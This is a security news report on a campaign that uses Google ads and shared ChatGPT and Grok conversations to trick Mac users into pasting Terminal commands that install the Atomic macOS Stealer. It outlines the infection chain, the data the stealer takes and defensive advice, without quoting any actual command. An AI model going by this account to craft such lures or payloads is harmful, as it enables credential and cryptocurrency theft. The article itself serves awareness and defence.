In order to spread the Atomic macOS Stealer (AMOS), cybercriminals have created a sophisticated attack campaign that takes advantage of users' faith in artificial intelligence platforms. This represents a risky advancement in social engineering techniques. In order to trick unwary Mac users into running malicious terminal commands that compromise their systems, this new threat combines paid Google advertising with genuine AI chatbot services from ChatGPT and Grok.

The ad specifically targets people looking for standard troubleshooting fixes, like freeing up disk space on macOS, and reroutes them to instructions that appear to be genuine AI-generated content hosted on reliable domains. The attack method makes use of a technique called "ClickFix," in which users are duped into manually executing shell commands that cause malware to be downloaded and installed on their devices.

Because the malicious instructions are hosted on official ChatGPT and Grok websites rather than dubious third-party domains, this campaign is especially successful at getting around conventional security measures by seeming entirely authentic. As soon as the AMOS stealer is run, it starts gathering private data, such as browser passwords, cryptocurrency wallet seed phrases, Keychain credentials, and private files, and sends it all to servers under the control of the attacker. Attackers create shareable AI chat links with detailed "installation guides" that are posing as authentic macOS troubleshooting instructions, according to Flare analysts.

Through paid advertising campaigns, these discussions are then elevated to the top of Google search results, guaranteeing optimal exposure when users look up frequently asked technical questions.

Because users naturally trust results that appear on trustworthy platforms like OpenAI and X, the social engineering component proves to be remarkably effective.AI domains, along with the extra credibility boost that comes from showing up as sponsored Google search results. Mechanism of Attack and Infection Chain When a Mac user searches for troubleshooting help on Google using terms like "clear disk space on macOS" or other technical terms, the infection process starts. Victims are directed to shared ChatGPT or Grok conversations that seem to provide useful system maintenance instructions through sponsored ads or highly ranked organic results.

Find out more Tools for remote access Managers of passwords Hacking news notifications The carefully constructed instructions in these AI-generated conversations instruct users to launch their Terminal application and paste what seems to be a harmless command.

Under the pretense of normal system operations, the malicious command downloads a script from an outside domain under the attackers' control, which then repeatedly asks for the user's system password. The script installs the AMOS infostealer and a persistent backdoor that endures system reboots and grants long-term remote access to the compromised machine after the correct credentials are entered. Targeting cryptocurrency wallets such as Electrum, Exodus, Coinbase, MetaMask, and Ledger Live, the malware instantly extracts seed phrases and private keys that allow for the instant theft of digital assets.

Furthermore, AMOS collects browser data from Chrome, Safari, and Firefox, including cookies, autofill data, saved passwords, and ongoing login sessions.

Businesses and individual Mac users should keep an eye out for unexpected network connections to unknown domains, unusual Terminal activity, and unsigned applications asking for system passwords. Users need to be made aware by security teams that social engineering can compromise instructions that appear on reliable AI platforms. Additionally, before implementing any guidance that requests the execution of a Terminal command, it should be independently confirmed through official support channels.

Set ZeroOwl as a Preferred Source in Google and use X, LinkedIn, and LinkedIn to receive more real-time updates.